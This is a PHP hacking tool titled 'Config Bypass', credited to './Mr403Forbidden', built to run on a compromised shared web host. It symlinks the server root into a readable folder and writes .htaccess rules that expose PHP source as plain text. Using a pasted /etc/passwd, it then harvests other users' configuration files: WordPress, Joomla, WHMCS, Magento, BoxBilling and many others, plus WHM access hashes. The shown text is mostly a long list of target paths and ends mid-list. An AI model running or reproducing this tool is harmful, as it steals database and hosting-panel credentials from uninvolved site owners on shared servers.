<html>
<title>Config Bypass ./Mr403Forbidden</title>
<style type='text/css'>
body {cursor:cross;
   background:url(https://images.pexels.com/photos/695644/pexels-photo-695644.jpeg) no-repeat center center fixed;
            -webkit-background-size: cover;
            -moz-background-size: cover;
            -o-background-size: cover;
            background-size: cover; }
</style>
<center><h1><font color="blue">Config Bypass</font></h1></center>
<center><h2><font color="lime">Created by ./Mr403Forbidden</font></h1></center>
</html><center><?php
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
	    echo '<script>alert("Tidak bisa di gunakan di server windows")</script>';
	    exit;
	    }
	    if($_POST){ if($_POST['config'] == 'symvhosts') {
	    @mkdir("x140_symvhosts", 0777);
	    exe("ln -s / x140_symvhosts/root");
	    $htaccess="Options Indexes FollowSymLinks
	    DirectoryIndex Mr403Forbidden.html
	    AddType text/plain .php 
	    AddHandler text/plain .php
	    Satisfy Any";
	    @file_put_contents("x140_symvhosts/.htaccess",$htaccess);
	        $etc_passwd=$_POST['passwd'];
	        
	        $etc_passwd=explode("\n",$etc_passwd);
	    foreach($etc_passwd as $passwd){
	    $pawd=explode(":",$passwd);
	    $user =$pawd[5];
	    $x140 = preg_replace('/\/var\/www\/vhosts\//', '', $user);
	    if (preg_match('/vhosts/i',$user)){
	    exe("ln -s ".$user."/httpdocs/wp-config.php x140_symvhosts/".$x140."-Wordpress.txt");
	    exe("ln -s ".$user."/httpdocs/configuration.php x140_symvhosts/".$x140."-Joomla.txt");
	    exe("ln -s ".$user."/httpdocs/config/koneksi.php x140_symvhosts/".$x140."-Lokomedia.txt");
	    exe("ln -s ".$user."/httpdocs/forum/config.php x140_symvhosts/".$x140."-phpBB.txt");
	    exe("ln -s ".$user."/httpdocs/sites/default/settings.php x140_symvhosts/".$x140."-Drupal.txt");
	    exe("ln -s ".$user."/httpdocs/config/settings.inc.php x140_symvhosts/".$x140."-PrestaShop.txt");
	    exe("ln -s ".$user."/httpdocs/app/etc/local.xml x140_symvhosts/".$x140."-Magento.txt");
	    exe("ln -s ".$user."/httpdocs/admin/config.php x140_symvhosts/".$x140."-OpenCart.txt");
	    exe("ln -s ".$user."/httpdocs/application/config/database.php x140_symvhosts/".$x140."-Ellislab.txt"); 
	    }}}
	    if($_POST['config'] == 'symlink') {
	    @mkdir("x140_symconfig", 0777);
	    @symlink("/","x140_symconfig/root");
	    $htaccess="Options Indexes FollowSymLinks
	    DirectoryIndex Mr403Forbidden.html
	    AddType text/plain .php 
	    AddHandler text/plain .php
	    Satisfy Any";
	    @file_put_contents("x140_symconfig/.htaccess",$htaccess);}
	    if($_POST['config'] == '404') {
	    @mkdir("x140_sym404", 0777);
	    @symlink("/","x140_sym404/root");
	    $htaccess="Options Indexes FollowSymLinks
	    DirectoryIndex Mr403Forbidden.html
	    AddType text/plain .php 
	    AddHandler text/plain .php
	    Satisfy Any
	    IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=*
	    IndexIgnore *.txt404
	    RewriteEngine On
	    RewriteCond %{REQUEST_FILENAME} ^.*x140_sym404 [NC]
	    RewriteRule \.txt$ %{REQUEST_URI}404 [L,R=302.NC]";
	    @file_put_contents("x140_sym404/.htaccess",$htaccess);
	    }
	    if($_POST['config'] == 'grab') {
      mkdir("x140_configgrab", 0777);
      $isi_htc = "Options all\nRequire None\nSatisfy Any";
      $htc = fopen("x140_configgrab/.htaccess","w");
      fwrite($htc, $isi_htc); 
	    }
	    $passwd = $_POST['passwd'];
	    
	    preg_match_all('/(.*?):x:/', $passwd, $user_config);
	    foreach($user_config[1] as $user_x140) {
	    $grab_config = array(
	    "/home/$user_x140/.accesshash" => "WHM-accesshash",
"/home/$user_x140/public_html/config/koneksi.php" => "Lokomedia",
"/home/$user_x140/public_html/forum/config.php" => "phpBB",
"/home/$user_x140/public_html/sites/default/settings.php" => "Drupal",
"/home/$user_x140/public_html/config/settings.inc.php" => "PrestaShop",
"/home/$user_x140/public_html/app/etc/local.xml" => "Magento",
"/home/$user_x140/public_html/admin/config.php" => "OpenCart",
"/home/$user_x140/public_html/application/config/database.php" => "Ellislab",
"/home/$user_x140/public_html/vb/includes/config.php" => "Vbulletin",
"/home/$user_x140/public_html/includes/config.php" => "Vbulletin",
"/home/$user_x140/public_html/forum/includes/config.php" => "Vbulletin",
"/home/$user_x140/public_html/forums/includes/config.php" => "Vbulletin",
"/home/$user_x140/public_html/cc/includes/config.php" => "Vbulletin",
"/home/$user_x140/public_html/inc/config.php" => "MyBB",
"/home/$user_x140/public_html/includes/configure.php" => "OsCommerce",
"/home/$user_x140/public_html/shop/includes/configure.php" => "OsCommerce",
"/home/$user_x140/public_html/os/includes/configure.php" => "OsCommerce",
"/home/$user_x140/public_html/oscom/includes/configure.php" => "OsCommerce",
"/home/$user_x140/public_html/products/includes/configure.php" => "OsCommerce",
"/home/$user_x140/public_html/cart/includes/configure.php" => "OsCommerce",
"/home/$user_x140/public_html/inc/conf_global.php" => "IPB",
"/home/$user_x140/public_html/wp-config.php" => "Wordpress",
"/home/$user_x140/public_html/wp/test/wp-config.php" => "Wordpress",
"/home/$user_x140/public_html/blog/wp-config.php" => "Wordpress",
"/home/$user_x140/public_html/beta/wp-config.php" => "Wordpress",
"/home/$user_x140/public_html/portal/wp-config.php" => "Wordpress",
"/home/$user_x140/public_html/site/wp-config.php" => "Wordpress",
"/home/$user_x140/public_html/wp/wp-config.php" => "Wordpress",
"/home/$user_x140/public_html/WP/wp-config.php" => "Wordpress",
"/home/$user_x140/public_html/news/wp-config.php" => "Wordpress",
"/home/$user_x140/public_html/wordpress/wp-config.php" => "Wordpress",
"/home/$user_x140/public_html/test/wp-config.php" => "Wordpress",
"/home/$user_x140/public_html/demo/wp-config.php" => "Wordpress",
"/home/$user_x140/public_html/home/wp-config.php" => "Wordpress",
"/home/$user_x140/public_html/v1/wp-config.php" => "Wordpress",
"/home/$user_x140/public_html/v2/wp-config.php" => "Wordpress",
"/home/$user_x140/public_html/press/wp-config.php" => "Wordpress",
"/home/$user_x140/public_html/new/wp-config.php" => "Wordpress",
"/home/$user_x140/public_html/blogs/wp-config.php" => "Wordpress",
"/home/$user_x140/public_html/configuration.php" => "Joomla",
"/home/$user_x140/public_html/blog/configuration.php" => "Joomla",
"/home/$user_x140/public_html/submitticket.php" => "^WHMCS",
"/home/$user_x140/public_html/cms/configuration.php" => "Joomla",
"/home/$user_x140/public_html/beta/configuration.php" => "Joomla",
"/home/$user_x140/public_html/portal/configuration.php" => "Joomla",
"/home/$user_x140/public_html/site/configuration.php" => "Joomla",
"/home/$user_x140/public_html/main/configuration.php" => "Joomla",
"/home/$user_x140/public_html/home/configuration.php" => "Joomla",
"/home/$user_x140/public_html/demo/configuration.php" => "Joomla",
"/home/$user_x140/public_html/test/configuration.php" => "Joomla",
"/home/$user_x140/public_html/v1/configuration.php" => "Joomla",
"/home/$user_x140/public_html/v2/configuration.php" => "Joomla",
"/home/$user_x140/public_html/joomla/configuration.php" => "Joomla",
"/home/$user_x140/public_html/new/configuration.php" => "Joomla",
"/home/$user_x140/public_html/WHMCS/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/whmcs1/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Whmcs/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/whmcs/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/whmcs/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/WHMC/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Whmc/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/whmc/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/WHM/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Whm/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/whm/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/HOST/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Host/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/host/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/SUPPORTES/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Supportes/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/supportes/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/domains/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/domain/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Hosting/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/HOSTING/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/hosting/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/CART/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Cart/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/cart/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/ORDER/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Order/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/order/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/CLIENT/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Client/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/client/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Clientarea/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/clientarea/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/SUPPORT/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Support/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/support/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/BILLING/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Billing/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/billing/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/BUY/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Buy/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/buy/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/MANAGE/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Manage/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/manage/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/ClientSupport/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Clientsupport/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/clientsupport/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/CHECKOUT/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Checkout/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/checkout/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/BILLINGS/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Billings/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/billings/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/BASKET/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Basket/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/basket/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/SECURE/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Secure/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/secure/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/SALES/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Sales/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/sales/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/BILL/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Bill/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/bill/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/PURCHASE/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Purchase/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/purchase/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/ACCOUNT/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Account/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/account/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/USER/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/User/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/user/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/CLIENTS/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Clients/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/clients/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/BILLINGS/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/Billings/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/billings/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/MY/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/My/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/my/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/secure/whm/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/secure/whmcs/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/panel/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/clientes/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/cliente/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/support/order/submitticket.php" => "WHMCS",
"/home/$user_x140/public_html/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/boxbilling/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/box/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/host/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/Host/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/supportes/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/support/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/hosting/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/cart/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/order/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/client/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/clients/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/cliente/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/clientes/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/billing/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/billings/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/my/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/secure/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/support/order/bb-config.php" => "BoxBilling",
"/home/$user_x140/public_html/includes/dist-configure.php" => "Zencart",
"/home/$user_x140/public_html/zencart/includes/dist-configure.php" => "Zencart",
"/home/$user_x140/public_html/products/includes/dist-configure.php" => "Zencart",
"/home/$user_x140/public_html/cart/includes/dist-configure.php" => "Zencart",
"/home/$user_x140/public_html/shop/includes/dist-configure.php" => "Zencart",
"/home/$user_x140/public_html/includes/iso4217.php" => "Hostbills",
"/home/$user_x140/public_html/hostbills/includes/iso4217.php" => "Hostbills",
"/home/$user_x140/public_html/host/includes/iso4217.php" => "Hostbills",
"/home/$user_x140/public_html/Host/includes/iso4217.php" => "Hostbills",
"/home/$user_x140/public_html/supportes/includes/iso4217.php" => "Hostbills",
"/home/$user_x140/public_html/support/includes/iso4217.php" => "Hostbills",
"/home/$user_x140/public_html/hosting/includes/iso4217.php" => "Hostbills",
"/home/$user_x140/public_html/cart/includes/iso4217.php" => "Hostbills",
"/home/$user_x140/public_html/order/includes/iso4217.php" => "Hostbills",
"/home/$user_x140/public_html/client/includes/iso4217.php" => "Hostbills",
"/home/$user_x140/public_html/clients/includes/iso4217.php" => "Hostbills",
"/home/$user_x140/public_html/cliente/includes/iso4217.php" => "Hostbills",
"/home/$user_x140/public_html/clientes/includes/iso4217.php" => "Hostbills",
"/home/$user_x140/public_html/billing/includes/iso4217.php" => "Hostbills",
"/home/$user_x140/public_html/billings/includes/iso4217.php" => "Hostbills",
"/home/$user_x140/public_html/my/includes/iso4217.php" => "Hostbills",
"/home/$user_x140/public_html/secure/includes/iso4217.php" => "Hostbills",
"/home/$user_x140/public_html/support/order/includes/iso4217.php" => "Hostbills",
"/home2/$user_x140/.accesshash" => "WHM-accesshash",
"/home2/$user_x140/public_html/config/koneksi.php" => "Lokomedia",
"/home2/$user_x140/public_html/forum/config.php" => "phpBB",
"/home2/$user_x140/public_html/sites/default/settings.php" => "Drupal",
"/home2/$user_x140/public_html/config/settings.inc.php" => "PrestaShop",
"/home2/$user_x140/public_html/app/etc/local.xml" => "Magento",
"/home2/$user_x140/public_html/admin/config.php" => "OpenCart",
"/home2/$user_x140/public_html/application/config/database.php" => "Ellislab",
"/home2/$user_x140/public_html/vb/includes/config.php" => "Vbulletin",
"/home2/$user_x140/public_html/includes/config.php" => "Vbulletin",
"/home2/$user_x140/public_html/forum/includes/config.php" => "Vbulletin",
"/home2/$user_x140/public_html/forums/includes/config.php" => "Vbulletin",
"/home2/$user_x140/public_html/cc/includes/config.php" => "Vbulletin",
"/home2/$user_x140/public_html/inc/config.php" => "MyBB",
"/home2/$user_x140/public_html/includes/configure.php" => "OsCommerce",
"/home2/$user_x140/public_html/shop/includes/configure.php" => "OsCommerce",
"/home2/$user_x140/public_html/os/includes/configure.php" => "OsCommerce",
"/home2/$user_x140/public_html/oscom/includes/configure.php" => "OsCommerce",
"/home2/$user_x140/public_html/products/includes/configure.php" => "OsCommerce",
"/home2/$user_x140/public_html/cart/includes/configure.php" => "OsCommerce",
"/home2/$user_x140/public_html/inc/conf_global.php" => "IPB",
"/home2/$user_x140/public_html/wp-config.php" => "Wordpress",
"/home2/$user_x140/public_html/wp/test/wp-config.php" => "Wordpress",
"/home2/$user_x140/public_html/blog/wp-config.php" => "Wordpress",
"/home2/$user_x140/public_html/beta/wp-config.php" => "Wordpress",
"/home2/$user_x140/public_html/portal/wp-config.php" => "Wordpress",
"/home2/$user_x140/public_html/site/wp-config.php" => "Wordpress",
"/home2/$user_x140/public_html/wp/wp-config.php" => "Wordpress",
"/home2/$user_x140/public_html/WP/wp-config.php" => "Wordpress",
"/home2/$user_x140/public_html/news/wp-config.php" => "Wordpress",
"/home2/$user_x140/public_html/wordpress/wp-config.php" => "Wordpress",
"/home2/$user_x140/public_html/test/wp-config.php" => "Wordpress",
"/home2/$user_x140/public_html/demo/wp-config.php" => "Wordpress",
"/home2/$user_x140/public_html/home2/wp-config.php" => "Wordpress",
"/home2/$user_x140/public_html/v1/wp-config.php" => "Wordpress",
"/home2/$user_x140/public_html/v2/wp-config.php" => "Wordpress",
"/home2/$user_x140/public_html/press/wp-config.php" => "Wordpress",
"/home2/$user_x140/public_html/new/wp-config.php" => "Wordpress",
"/home2/$user_x140/public_html/blogs/wp-config.php" => "Wordpress",
"/home2/$user_x140/public_html/configuration.php" => "Joomla",
"/home2/$user_x140/public_html/blog/configuration.php" => "Joomla",
"/home2/$user_x140/public_html/submitticket.php" => "^WHMCS",
"/home2/$user_x140/public_html/cms/configuration.php" => "Joomla",
"/home2/$user_x140/public_html/beta/configuration.php" => "Joomla",
"/home2/$user_x140/public_html/portal/configuration.php" => "Joomla",
"/home2/$user_x140/public_html/site/configuration.php" => "Joomla",
"/home2/$user_x140/public_html/main/configuration.php" => "Joomla",
"/home2/$user_x140/public_html/home2/configuration.php" => "Joomla",
"/home2/$user_x140/public_html/demo/configuration.php" => "Joomla",
"/home2/$user_x140/public_html/test/configuration.php" => "Joomla",
"/home2/$user_x140/public_html/v1/configuration.php" => "Joomla",
"/home2/$user_x140/public_html/v2/configuration.php" => "Joomla",
"/home2/$user_x140/public_html/joomla/configuration.php" => "Joomla",
"/home2/$user_x140/public_html/new/configuration.php" => "Joomla",
"/home2/$user_x140/public_html/WHMCS/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/whmcs1/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Whmcs/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/whmcs/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/whmcs/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/WHMC/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Whmc/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/whmc/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/WHM/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Whm/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/whm/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/HOST/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Host/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/host/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/SUPPORTES/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Supportes/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/supportes/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/domains/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/domain/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Hosting/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/HOSTING/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/hosting/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/CART/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Cart/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/cart/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/ORDER/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Order/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/order/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/CLIENT/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Client/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/client/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Clientarea/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/clientarea/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/SUPPORT/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Support/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/support/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/BILLING/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Billing/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/billing/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/BUY/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Buy/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/buy/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/MANAGE/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Manage/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/manage/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/ClientSupport/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Clientsupport/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/clientsupport/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/CHECKOUT/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Checkout/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/checkout/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/BILLINGS/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Billings/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/billings/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/BASKET/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Basket/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/basket/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/SECURE/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Secure/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/secure/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/SALES/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Sales/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/sales/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/BILL/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Bill/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/bill/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/PURCHASE/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Purchase/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/purchase/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/ACCOUNT/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Account/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/account/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/USER/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/User/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/user/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/CLIENTS/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Clients/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/clients/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/BILLINGS/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/Billings/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/billings/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/MY/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/My/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/my/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/secure/whm/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/secure/whmcs/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/panel/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/clientes/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/cliente/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/support/order/submitticket.php" => "WHMCS",
"/home2/$user_x140/public_html/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/boxbilling/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/box/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/host/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/Host/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/supportes/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/support/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/hosting/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/cart/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/order/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/client/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/clients/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/cliente/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/clientes/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/billing/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/billings/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/my/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/secure/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/support/order/bb-config.php" => "BoxBilling",
"/home2/$user_x140/public_html/includes/dist-configure.php" => "Zencart",
"/home2/$user_x140/public_html/zencart/includes/dist-configure.php" => "Zencart",
"/home2/$user_x140/public_html/products/includes/dist-configure.php" => "Zencart",
"/home2/$user_x140/public_html/cart/includes/dist-configure.php" => "Zencart",
"/home2/$user_x140/public_html/shop/includes/dist-configure.php" => "Zencart",
"/home2/$user_x140/public_html/includes/iso4217.php" => "Hostbills",
"/home2/$user_x140/public_html/hostbills/includes/iso4217.php" => "Hostbills",
"/home2/$user_x140/public_html/host/includes/iso4217.php" => "Hostbills",
"/home2/$user_x140/public_html/Host/includes/iso4217.php" => "Hostbills",
"/home2/$user_x140/public_html/supportes/includes/iso4217.php" => "Hostbills",
"/home2/$user_x140/public_html/support/includes/iso4217.php" => "Hostbills",
"/home2/$user_x140/public_html/hosting/includes/iso4217.php" => "Hostbills",
"/home2/$user_x140/public_html/cart/includes/iso4217.php" => "Hostbills",
"/home2/$user_x140/public_html/order/includes/iso4217.php" => "Hostbills",
"/home2/$user_x140/public_html/client/includes/iso4217.php" => "Hostbills",
"/home2/$user_x140/public_html/clients/includes/iso4217.php" => "Hostbills",
"/home2/$user_x140/public_html/cliente/includes/iso4217.php" => "Hostbills",
"/home2/$user_x140/public_html/clientes/includes/iso4217.php" => "Hostbills",
"/home2/$user_x140/public_html/billing/includes/iso4217.php" => "Hostbills",
"/home2/$user_x140/public_html/billings/includes/iso4217.php" => "Hostbills",
"/home2/$user_x140/public_html/my/includes/iso4217.php" => "Hostbills",
"/home2/$user_x140/public_html/secure/includes/iso4217.php" => "Hostbills",
"/home2/$user_x140/public_html/support/order/includes/iso4217.php" => "Hostbills",
"/home3/$user_x140/.accesshash" => "WHM-accesshash",
"/home3/$user_x140/public_html/config/koneksi.php" => "Lokomedia",
"/home3/$user_x140/public_html/forum/config.php" => "phpBB",
"/home3/$user_x140/public_html/sites/default/settings.php" => "Drupal",
"/home3/$user_x140/public_html/config/settings.inc.php" => "PrestaShop",
"/home3/$user_x140/public_html/app/etc/local.xml" => "Magento",
"/home3/$user_x140/public_html/admin/config.php" => "OpenCart",
